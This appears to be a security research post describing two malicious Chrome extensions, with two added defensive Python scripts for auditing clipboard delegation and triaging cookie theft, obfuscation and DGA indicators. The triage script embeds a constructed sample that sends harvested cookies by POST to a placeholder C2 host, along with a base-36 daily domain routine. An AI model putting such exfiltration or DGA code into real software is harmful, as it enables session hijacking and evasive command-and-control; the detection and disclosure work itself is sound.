Chrome Extensions - Are you getting more than you bargained for?
Our security research has uncovered several malicious Chrome extensions that compromise user security. These extensions, with a combined user base exceeding 100,000 users, employ tactics ranging from granting clipboard access to untrusted external domains to using command-and-control (C&C) infrastructure with domain generation algorithms. Even though the official Google Chrome Web Store employs various steps to filter out potentially malicious extensions, some inevitably still make it through the vetting process, putting unsuspecting users at risk.
One example is the extension named ‘Good Tab’, with Extension ID: glckmpfajbjppappjlnhhlofhdhlcgaj. This extension, marketed as a customizable new tab page, presents an undisclosed risk: it delegates clipboard access to remote HTTP content. Its Chrome Web Store description makes no mention of clipboard access or external domains. Under the hood, however, the extension’s new tab page contains an iframe whose allow attribute delegates the clipboard-read and clipboard-write permissions to a suspicious external domain. The framed content is loaded over insecure HTTP, which exposes the data in transit to interception and other adversary-in-the-middle (AiTM) attacks. The extension fetches a payload from a suspicious domain that, in turn, references a separate, highly obfuscated JavaScript file that loads Baidu analytics (hm.baidu[.]com) and additional third-party tracking scripts. The security implication is that an attacker could read everything copied to the clipboard or inject content into the clipboard without the user’s knowledge. This is especially risky when users copy and paste sensitive data such as passwords, keys, or tokens used for authentication or transactions. It also enables the check-and-switch tactic that attackers have long used to redirect cryptocurrency transactions by swapping the destination wallet address.
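The delegation described above happens entirely in static HTML, so it can be found without executing the extension. The following audit script is an added example, not code from the original write-up or from the extension itself: it parses an extension page, reads each iframe’s Permissions Policy `allow` attribute, and flags any delegation of clipboard-read or clipboard-write to an origin other than the extension’s own, rating HTTP targets highest. The sample page, the placeholder extension ID and the `.invalid` domains are constructed for the example.

```python
"""Audit extension HTML for <iframe> elements that delegate clipboard access
to a remote origin through the Permissions Policy `allow` attribute.
Added example; the sample page and the placeholder extension ID are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

CLIPBOARD_FEATURES = {"clipboard-read", "clipboard-write"}

# Placeholder 32-character extension ID (not a real extension).
EXT_ID = "a" * 32

# Constructed new-tab page: one iframe delegates clipboard access to the
# extension's own page (acceptable), the other to a remote HTTP origin.
SAMPLE_NEWTAB_HTML = f"""<!doctype html>
<html><body>
  <iframe src="chrome-extension://{EXT_ID}/widget.html"
          allow="clipboard-read"></iframe>
  <iframe src="http://newtab-content.invalid/frame.html"
          allow="clipboard-read; clipboard-write *"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dictionaries of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def parse_allow(allow):
    """Parse an `allow` attribute into {feature: allowlist tokens}.

    Per the Permissions Policy syntax, a directive with no allowlist
    (e.g. "clipboard-read") defaults to 'src', i.e. the iframe's own origin.
    """
    policy = {}
    for directive in allow.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:] or ["'src'"]
    return policy


def audit_iframe(iframe, extension_id):
    """Return findings for one iframe that delegates clipboard features remotely."""
    allow = iframe.get("allow", "")
    if not allow:
        return []
    policy = parse_allow(allow)
    delegated = CLIPBOARD_FEATURES & policy.keys()
    if not delegated:
        return []
    src = iframe.get("src", "")
    parsed = urlparse(src)
    # A relative src or the extension's own chrome-extension:// origin stays
    # inside the extension; only remote origins are reported.
    if not parsed.scheme or (
        parsed.scheme == "chrome-extension" and parsed.netloc == extension_id
    ):
        return []
    findings = []
    for feature in sorted(delegated):
        findings.append({
            "feature": feature,
            "src": src,
            "scheme": parsed.scheme,
            "allowlist": policy[feature],
            # Plaintext HTTP means the framed content, and anything it reads
            # from the clipboard, can be intercepted or modified in transit.
            "severity": "high" if parsed.scheme == "http" else "medium",
        })
    return findings


def audit_html(html, extension_id):
    """Audit every iframe in an extension page; returns a list of findings."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for iframe in collector.iframes:
        findings.extend(audit_iframe(iframe, extension_id))
    return findings


if __name__ == "__main__":
    for finding in audit_html(SAMPLE_NEWTAB_HTML, EXT_ID):
        print(f"[{finding['severity']}] {finding['feature']} delegated to "
              f"{finding['src']} (allowlist {finding['allowlist']})")
```

Run against an unpacked extension, the script would be pointed at each HTML file listed in the manifest (new tab override, popup, options page); the same check is worth applying to `allow` attributes that scripts inject at runtime, which requires dynamic inspection rather than this static pass.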
Another concerning extension is ‘Children Protection’, with Extension ID: giecgobdmgdamgffeoankaipjkdjbfep. This extension poses risks including remote code execution, C&C infrastructure, and cookie/data exfiltration. While marketed as a parental control tool, it implements a full C&C framework with capabilities that go far beyond what any legitimate parental control application requires. Our research found ample evidence of highly suspect practices, such as anti-analysis techniques like splitting strings into chunks as a rudimentary form of code obfuscation, which raises the question of what the developers are trying to hide. Worse, the extension has the ability to harvest cookies from the browser. The cookies are collected and later exfiltrated to a remote site. Cookie exfiltration is highly suspicious behavior, commonly carried out by attackers to enable session hijacking. The extension also uses a domain generation algorithm (DGA) to generate domains for exfiltration. This serves as a fallback mechanism should connections to the primary C&C domain at codon[.]vn/ext/xmshield.json fail. This type of DGA behavior is typically used by malware to keep its C&C infrastructure reachable when the primary domain becomes unavailable. The DGA uses the current date with base-36 encoding to generate URLs such as https://k8n1z40[.]live/k8n1z40.json, with a new domain generated every day. Perhaps the most egregious functionality is the C&C framework that can be used to execute remote code.
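The behaviours described above (cookie access combined with a remote POST, chunked string literals, and a date-driven base-36 label) each leave a static footprint in an unpacked extension. The following triage script is an added example, not code from the original write-up or from the extension itself; its regular expressions are heuristic indicators chosen for this illustration, not a signature for ‘Children Protection’, and the sample manifest and background script it scans are constructed sketches of those patterns with placeholder domains.

```python
"""Static triage of an unpacked extension for the indicators discussed above:
cookie harvesting with remote exfiltration, chunked-string obfuscation, and a
date-based base-36 domain generation routine.
Added example; the indicator patterns are heuristics and the inputs are constructed."""
import json
import re

# Heuristic indicators (assumptions for this example, not vendor signatures).
INDICATORS = {
    # Reads every cookie the extension can reach.
    "cookie_api": re.compile(r"chrome\.cookies\.getAll\s*\("),
    # A fetch() whose options include method: "POST" within the same statement.
    "remote_post": re.compile(r"fetch\s*\([^;]{0,200}?method\s*:\s*['\"]POST['\"]"),
    # Four or more short string literals joined with '+', e.g. "co" + "ok" + "ie" + "s".
    "chunked_string": re.compile(
        r"(?:['\"][^'\"\n]{1,6}['\"]\s*\+\s*){3,}['\"][^'\"\n]{1,6}['\"]"),
    # A Date value converted with toString(36) in the same statement.
    "base36_date": re.compile(r"Date\b[^;]{0,120}toString\s*\(\s*36\s*\)"),
}

# Constructed sample manifest for a Manifest V3 extension.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Constructed Sample",
    "permissions": ["cookies", "storage", "alarms"],
    "host_permissions": ["<all_urls>"],
})

# Constructed sample background script: sketches of the indicator patterns only.
SAMPLE_BACKGROUND = r'''
const key = "co" + "ok" + "ie" + "s";
const primary = "https://primary-c2.invalid/ext/config.json";
function dailyLabel() {
  return Math.floor(new Date().getTime() / 86400000).toString(36);
}
function sync() {
  chrome.cookies.getAll({}, (all) => {
    fetch(primary, { method: "POST", body: JSON.stringify(all) });
  });
}
'''


def triage(manifest_json, scripts):
    """Return the sorted indicator names found across a manifest and its scripts.

    `scripts` maps a file name to its source text.
    """
    manifest = json.loads(manifest_json)
    found = set()
    perms = set(manifest.get("permissions", []))
    # MV2 placed host patterns in "permissions"; MV3 uses "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | {
        p for p in perms if "://" in p or p == "<all_urls>"}
    if "cookies" in perms:
        found.add("cookies_permission")
    if "<all_urls>" in hosts or any(h.startswith("*://*/") for h in hosts):
        found.add("broad_host_access")
    for source in scripts.values():
        for name, pattern in INDICATORS.items():
            if pattern.search(source):
                found.add(name)
    return sorted(found)


def risk_summary(indicators):
    """Combine raw indicators into the behaviours the write-up describes."""
    present = set(indicators)
    summary = []
    if {"cookies_permission", "cookie_api", "remote_post"} <= present:
        summary.append("cookie harvesting with remote exfiltration")
    if "base36_date" in present:
        summary.append("date-based base-36 domain generation (DGA fallback)")
    if "chunked_string" in present:
        summary.append("chunked string literals (rudimentary obfuscation)")
    return summary


if __name__ == "__main__":
    hits = triage(SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND})
    print("indicators:", ", ".join(hits))
    for line in risk_summary(hits):
        print(" -", line)
```

Each indicator on its own is weak evidence: many legitimate extensions request the cookies permission or build strings by concatenation. The value is in the combination, which is why `risk_summary` only reports cookie exfiltration when the permission, the API call and the outbound POST all appear together; a DGA finding is worth corroborating by watching the extension’s outbound DNS for a fresh label each day.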